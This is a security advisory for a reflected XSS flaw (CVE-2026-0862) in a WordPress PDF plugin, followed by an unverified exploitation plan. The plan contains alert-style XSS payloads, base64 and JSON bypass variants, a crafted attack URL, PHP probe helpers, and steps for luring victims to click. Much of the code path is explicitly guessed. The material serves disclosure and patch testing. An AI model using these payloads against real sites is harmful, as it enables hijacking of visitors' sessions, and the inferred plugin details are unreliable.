CVE-2026-0862

Save as PDF Plugin by PDFCrowd <= 4.5.5 - Reflected Cross-Site Scripting via options

Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.1
Severity: Medium
Patched in: 4.5.6
Time to patch: 1d

Description

The Save as PDF Plugin by PDFCrowd plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘options’ parameter in all versions up to, and including, 4.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: Successful exploitation of this vulnerability requires that the PDFCrowd API key is blank (also known as "demo mode", which is the default configuration when the plugin is installed) or known.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Privileges Required: None (PR:N)
User Interaction: Required (UI:R)
Scope: Changed (S:C)
Confidentiality: Low (C:L)
Integrity: Low (I:L)
Availability: None (A:N)

Technical Details

Affected versions: <= 4.5.5
Published: January 24, 2026
Last updated: January 24, 2026

Research Plan
Status: Unverified


Exploitation Research Plan: CVE-2026-0862

1. Vulnerability Summary

The Save as PDF Plugin by PDFCrowd (<= 4.5.5) contains a reflected cross-site scripting (XSS) vulnerability. The plugin fails to sufficiently sanitize and escape the options query parameter when processing requests to generate PDFs. When the plugin is in "demo mode" (API key is blank, which is the default state), it reflects the options parameter back into the HTML response. This allows an unauthenticated attacker to execute arbitrary JavaScript in the context of the victim's browser session by tricking them into clicking a crafted link.

2. Attack Vector Analysis

  • Vulnerable Endpoint: the site's front end (any page on which the plugin handles its PDF-generation request).
  • Parameters: options carries the payload and is the only parameter named in the advisory; the pdfcrowd action trigger used below is this plan's inference and must be confirmed against the plugin source.
  • Authentication: none (PR:N). The victim who opens the link may be logged in or anonymous; a logged-in administrator is the higher-value target.
  • Preconditions:
    1. The PDFCrowd API key is blank (the default after installation, "demo mode") or known to the attacker.
    2. The plugin is active.

3. Code Flow

The vulnerable code path has not been confirmed against the plugin source; the flow below is inferred from the advisory text and is expected to live in the main plugin file or a dedicated handler (e.g. pdfcrowd.php).

  1. Entry Point: the plugin hooks init or template_redirect and listens for the pdfcrowd query parameter.
    • Likely hook: add_action('init', array($this, 'process_request')) (inferred).
  2. Condition Check: the handler runs when isset($_GET['pdfcrowd']) is true.
  3. Demo Mode Logic: if the stored API key (an option such as pdfcrowd_api_key; the name is inferred) is empty, the plugin enters demo mode.
  4. Vulnerable Sink: inside the demo-mode handler, or while constructing the PDFCrowd client, the value of $_GET['options'] is read without sanitization.
  5. Reflected Output: that raw value is echoed into the page, most likely inside a JavaScript block or an HTML attribute used to initialise the demo overlay or link.
    • Hypothesized sink: echo '... options: ' . $_GET['options'] . ' ...'; or value="' . $_GET['options'] . '". In either form the missing step is context-appropriate output escaping (esc_attr() for an attribute value, wp_json_encode() with JSON_HEX_TAG for a script block), which is the class of fix the advisory's wording ("insufficient input sanitization and output escaping") points to.
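Because the sink is only hypothesized, the following is an added illustration and not the plugin's code: it renders the two reflection contexts the plan names, an HTML attribute and an inline script block, once without escaping (the assumed <= 4.5.5 behaviour) and once with the escaping a fix would apply, then runs the plan's two break-out payloads through both. The function names, the markup and the option handling are assumptions. It runs under a plain PHP 8 CLI; the stand-ins for esc_attr() and wp_json_encode() are only used when WordPress is not loaded and mirror what those helpers do.

```php
<?php
// Added illustration for CVE-2026-0862; this is not the plugin's code.
// Two reflection contexts (attribute, inline script), rendered without
// escaping (assumed <= 4.5.5 behaviour) and with context-appropriate
// escaping. Function names and markup are assumptions.

// Stand-ins so the file runs under plain `php` with WordPress not loaded.
// WordPress's esc_attr() is entity encoding with ENT_QUOTES; wp_json_encode()
// wraps json_encode() and accepts the same JSON_* flags.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('wp_json_encode')) {
    function wp_json_encode($data, int $flags = 0) {
        return json_encode($data, $flags);
    }
}

// Hypothesized demo-mode sink: the raw `options` query value is dropped into
// an attribute and into a JS initialiser with no escaping at all.
function render_demo_vulnerable(string $options): string {
    return '<a class="pdfcrowd-demo" data-options="' . $options . '">Save as PDF</a>' . "\n"
         . '<script>var pdfcrowdOptions = "' . $options . '";</script>';
}

// Same markup with escaping chosen per context: esc_attr() inside the
// attribute, JSON encoding with the JSON_HEX_* flags inside the script, so
// neither a quote nor a </script> sequence can terminate its container.
function render_demo_fixed(string $options): string {
    $jsFlags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<a class="pdfcrowd-demo" data-options="' . esc_attr($options) . '">Save as PDF</a>' . "\n"
         . '<script>var pdfcrowdOptions = ' . wp_json_encode($options, $jsFlags) . ';</script>';
}

// Section 8's first check: is the payload present verbatim in the response?
function reflected_verbatim(string $html, string $payload): bool {
    return str_contains($html, $payload);
}

// The plan's break-out payloads, one per context.
$payloads = [
    'attribute' => '"><script>alert(document.domain)</script>',
    'script'    => '";alert(1);//',
];

foreach ($payloads as $context => $payload) {
    foreach (['vulnerable' => 'render_demo_vulnerable', 'fixed' => 'render_demo_fixed'] as $label => $fn) {
        $html = $fn($payload);
        printf("%-9s %-10s verbatim reflection: %s\n", $context, $label,
            reflected_verbatim($html, $payload) ? 'yes' : 'no');
        echo $html, "\n";
    }
    echo "\n";
}
```

Run with php demo.php. The vulnerable renderer reports "yes" for both payloads; the fixed renderer reports "no" for both, because the attribute payload comes back as &quot;&gt;&lt;script&gt;... and the script payload as "\u0022;alert(1);\/\/", neither of which can leave its container.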

4. Nonce Acquisition Strategy

Reflected XSS on an unauthenticated GET handler does not normally involve a nonce, and nothing in the advisory suggests one; the primary vector is a direct link, with the server processing $_GET['options'] as soon as the page loads.

If the pdfcrowd action does turn out to require a nonce:

  1. Identify Localization: the plugin likely enqueues a script and localizes a nonce into it.
  2. Shortcode: place the [pdfcrowd] shortcode (inferred) or the widget on a page.
  3. Extraction:
    • wp post create --post_type=page --post_status=publish --post_title="PDF Test" --post_content='[pdfcrowd]'
    • Load the page in a browser.
    • In the browser console, inspect window.pdfcrowd?.nonce (name inferred) or whatever localized script object the plugin actually emits.

5. Exploitation Strategy

The exploit involves crafting a URL that triggers the pdfcrowd action and includes an XSS payload in the options parameter.

HTTP Request (PoC)

  • Method: GET
  • URL: http://localhost:8080/ (local test instance)
  • Parameters:
    • pdfcrowd: save_as_pdf (placeholder; take the real action string from the plugin source)
    • options: <script>alert(document.domain)</script> (URL-encode the value when sending; shown decoded for readability)
  • Tool: any HTTP client, e.g. curl

Crafted Payload

If the value lands inside a quoted HTML attribute rather than in element content, close the attribute and the tag before the script element:
?pdfcrowd=save_as_pdf&options="><script>alert(window.origin)</script>

6. Test Data Setup

  1. Install Plugin: install save-as-pdf-by-pdfcrowd version 4.5.5 (the last affected release).
  2. Verify Default State: confirm the API key is blank. The option name is inferred, so list the plugin's options rather than guessing one:
    • wp option list --search='pdfcrowd*' (then wp option get on the matching name, e.g. pdfcrowd_options, and check the api_key field is empty).
  3. Plugin Configuration: no further settings are needed; a fresh install is already in "demo mode".

7. Expected Results

  1. The HTTP response body contains the payload verbatim: <script>alert(document.domain)</script>.
  2. Opened in a browser, the page shows the alert.
  3. The response Content-Type is text/html. A JSON or application/pdf response, or one served with Content-Disposition: attachment, would not execute script in the page even if the payload is reflected.

8. Verification Steps

  1. Manual Check: Search the response body for the payload.
    • grep -q "<script>alert(document.domain)</script>" response.html
  2. Context Check: Determine where the payload is reflected.
    • If it's inside a <script> tag: Use payload ";alert(1);//.
    • If it's inside an HTML attribute: Use payload "><img src=x onerror=alert(1)>.

9. Alternative Approaches

If the options parameter is expected to be a JSON object or Base64 encoded:

Base64 Bypass (if applicable)

If the plugin uses base64_decode($_GET['options']) before echoing:

  1. Encode payload: echo -n '"><script>alert(1)</script>' | base64
  2. URL: ?pdfcrowd=save_as_pdf&options=Ij48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2B
     The trailing + of the base64 output must be sent as %2B: PHP decodes a bare + in a query string as a space, and the value would no longer decode.

JSON Bypass

If reflected inside a JS object:

  1. Payload: {"key":"value\"};alert(1);//"}
  2. URL: ?pdfcrowd=save_as_pdf&options=%7B%22key%22%3A%22value%5C%22%7D%3Balert(1)%3B%2F%2F%22%7D
     (the backslash is sent as %5C). Whether this breaks out depends on whether the plugin json_decode()s the value and re-emits the decoded string unescaped, or echoes the raw parameter; adjust the payload to the reflection context actually observed.
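The probe and context-check steps of sections 5 to 9, collected into one added PHP 8 CLI helper that is not the plugin's code and not a verified exploit: it builds percent-encoded probe URLs for the raw, base64 and JSON forms of options (so the base64 + problem above cannot occur), and classifies where a reflected canary landed in a response body so that the follow-up payload from section 8 can be chosen. The pdfcrowd=save_as_pdf trigger, the parameter layout and the sample response bodies are assumptions; the samples are constructed, not captured from the plugin.

```php
<?php
// Added helper for sections 5-9 of the research plan; not the plugin's code
// and not a verified exploit. Builds percent-encoded probe URLs for the raw,
// base64 and JSON forms of `options`, and classifies where a reflected canary
// landed in a response body. The trigger value, parameter layout and sample
// bodies below are assumptions (samples are constructed, not captured).

// Probe URL. http_build_query() percent-encodes the value, so a '+' in base64
// output is sent as %2B instead of being read back as a space by PHP.
function build_probe_url(string $base, string $options, string $trigger = 'save_as_pdf'): string {
    $query = http_build_query(['pdfcrowd' => $trigger, 'options' => $options], '', '&', PHP_QUERY_RFC3986);
    return rtrim($base, '/') . '/?' . $query;
}

// The three encodings of one canary that sections 5 and 9 try in turn.
function probe_variants(string $canary): array {
    return [
        'raw'    => $canary,
        'base64' => base64_encode($canary),
        'json'   => json_encode(['key' => $canary]),
    ];
}

// Where does the first occurrence of $canary sit? 'script' inside an open
// <script> element, 'attribute' inside a tag, 'text' in element content,
// 'none' if absent. A heuristic for choosing the next payload, not a parser.
function reflection_context(string $body, string $canary): string {
    $pos = strpos($body, $canary);
    if ($pos === false) {
        return 'none';
    }
    $before    = substr($body, 0, $pos);
    $lastOpen  = strripos($before, '<script');
    $lastClose = strripos($before, '</script');
    if ($lastOpen !== false && ($lastClose === false || $lastClose < $lastOpen)) {
        return 'script';
    }
    $lastLt = strrpos($before, '<');
    $lastGt = strrpos($before, '>');
    if ($lastLt !== false && ($lastGt === false || $lastGt < $lastLt)) {
        return 'attribute';
    }
    return 'text';
}

// Section 8's follow-up payload for each context.
function followup_payload(string $context): ?string {
    return match ($context) {
        'script'    => '";alert(1);//',
        'attribute' => '"><img src=x onerror=alert(1)>',
        'text'      => '<script>alert(document.domain)</script>',
        default     => null,
    };
}

$base   = 'http://localhost:8080';
$canary = 'pdfcrowdcanary7';

echo "Probe URLs:\n";
foreach (probe_variants($canary) as $variant => $value) {
    printf("  %-6s %s\n", $variant, build_probe_url($base, $value));
}

// Constructed responses standing in for what a target might return.
$samples = [
    '<script>var o = {options: "' . $canary . '"};</script>',
    '<a href="#" data-options="' . $canary . '">Save as PDF</a>',
    '<p>Demo mode, options: ' . $canary . '</p>',
    '<p>Nothing reflected here.</p>',
];

echo "\nReflection contexts:\n";
foreach ($samples as $body) {
    $ctx = reflection_context($body, $canary);
    printf("  %-9s next payload: %s\n", $ctx, followup_payload($ctx) ?? '(none)');
}
```

Send each probe URL with a plain canary first, run the response through reflection_context(), and only then send the context-specific payload; a canary with no special characters tells you where the value lands without tripping whatever filtering the plugin may apply.
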
Research Findings
Static analysis — not yet PoC-verified

Summary

The Save as PDF Plugin by PDFCrowd for WordPress is vulnerable to reflected Cross-Site Scripting (XSS) via the 'options' parameter in versions up to 4.5.5. This vulnerability allows unauthenticated attackers to execute arbitrary JavaScript in the context of a victim's browser when the plugin is in its default 'demo mode' (no API key configured).

Exploit Outline

  1. Verify the target site is using the plugin in 'demo mode' (default state with no API key provided).
  2. Construct a malicious URL using the 'pdfcrowd' trigger and the 'options' query parameter.
  3. Include a reflected XSS payload in the 'options' parameter, such as: ?pdfcrowd=save_as_pdf&options="><script>alert(window.origin)</script>
  4. Trick a target user (authenticated or unauthenticated) into clicking the link.
  5. The plugin reflects the 'options' value into the HTML response without adequate sanitization or escaping, leading to script execution.
